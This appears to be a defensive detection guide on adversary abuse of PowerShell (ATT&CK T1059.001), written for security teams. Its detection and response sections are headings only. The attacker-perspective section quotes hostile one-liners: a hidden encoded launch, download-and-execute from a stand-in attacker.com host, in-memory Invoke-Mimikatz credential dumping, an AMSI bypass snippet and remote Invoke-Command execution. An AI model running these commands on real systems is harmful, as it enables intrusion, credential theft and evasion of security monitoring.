Overview

PowerShell (T1059.001) refers to adversary abuse of Windows PowerShell — Microsoft’s built-in scripting language and interactive shell — to execute commands, run scripts, download payloads, and perform post-exploitation activity. Because PowerShell is deeply integrated into Windows administration and automation, it is available on virtually every modern Windows endpoint and server by default. Attackers exploit this ubiquity to blend into legitimate administrative traffic, making PowerShell one of the most heavily abused living-off-the-land (LotL) techniques observed in real-world intrusions.

The capability range available to an attacker through PowerShell is enormous: it can download and execute code directly in memory without writing to disk (fileless execution), interact with the Windows API, enumerate Active Directory, pivot to remote systems via Invoke-Command or WinRM, exfiltrate data, establish C2 channels over HTTP/S or DNS, and bypass application whitelisting controls. Entire offensive frameworks — Empire, PowerSploit, PoshC2, Cobalt Strike’s PowerShell stagers — are built on top of PowerShell. Critically, PowerShell can also be invoked without launching powershell.exe at all, by directly calling the System.Management.Automation .NET assembly from within a custom host process, making purely process-name-based detections insufficient.

Every security team must build layered detection coverage for this technique. It appears consistently across ransomware, nation-state, and financially motivated intrusion campaigns. The combination of native availability, broad capability, and multiple evasion avenues — encoding, obfuscation, alternate hosts, constrained language mode bypass — means that a single detection rule is never enough. Teams need telemetry from Script Block Logging, module logging, process creation events, and network visibility working together.

Attacker Perspective

Adversaries use PowerShell at nearly every phase of an intrusion. The following scenarios represent patterns seen repeatedly in real-world campaigns and red team engagements:

• Fileless stager execution via encoded commands: Phishing or exploit delivers a small dropper that runs powershell.exe -NoP -NonI -W Hidden -Enc <base64_blob>. The decoded payload downloads a second-stage implant directly into memory using IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2'), leaving no executable on disk. Cobalt Strike, Metasploit, and Empire all generate payloads in this pattern.
• Living-off-the-land credential harvesting: After gaining an initial foothold, attackers run Invoke-Mimikatz from PowerSploit entirely in memory: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds. No mimikatz binary is ever written to disk, but LSASS memory is read and credentials extracted.
• Invoke-Obfuscation and AMSI bypass: Sophisticated attackers obfuscate PowerShell payloads using tools like Invoke-Obfuscation or ISE-Steroids to evade signature-based detection, then prepend AMSI bypass snippets such as [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) before executing the actual malicious code. The Red Canary 2023 Threat Detection Report consistently lists AMSI bypass patterns in top observed techniques.
• WMI and PowerShell lateral movement: Attackers use Invoke-WMIMethod or Invoke-Command to execute encoded PowerShell remotely on other hosts without interactively logging in: Invoke-Command -ComputerName TARGET -ScriptBlock { IEX ... }. This pattern is characteristic of APT29, FIN7, and numerous ransomware operators during their lateral movement phase.
• PowerShell-based C2 and DNS exfiltration: Tools like Dnscat2 (via Start-Dnscat2) and PowerShell Empire establish C2 channels over DNS or HTTP from within a PowerShell runspace. This allows continued attacker access even when direct TCP connections are blocked, using the DNS resolver as a covert channel.

PowerShell is attractive to attackers because it is signed by Microsoft, present on every Windows system, can operate entirely in memory, integrates natively with .NET and the Windows API, supports rich obfuscation, and generates log noise in environments that haven’t tuned their detections — making malicious activity easy to hide among legitimate administrative use. Its dual-use nature means defenders must be surgical rather than simply blocking the binary.

Detection Strategy

When the Alert Fires: Investigation Steps

Response Playbook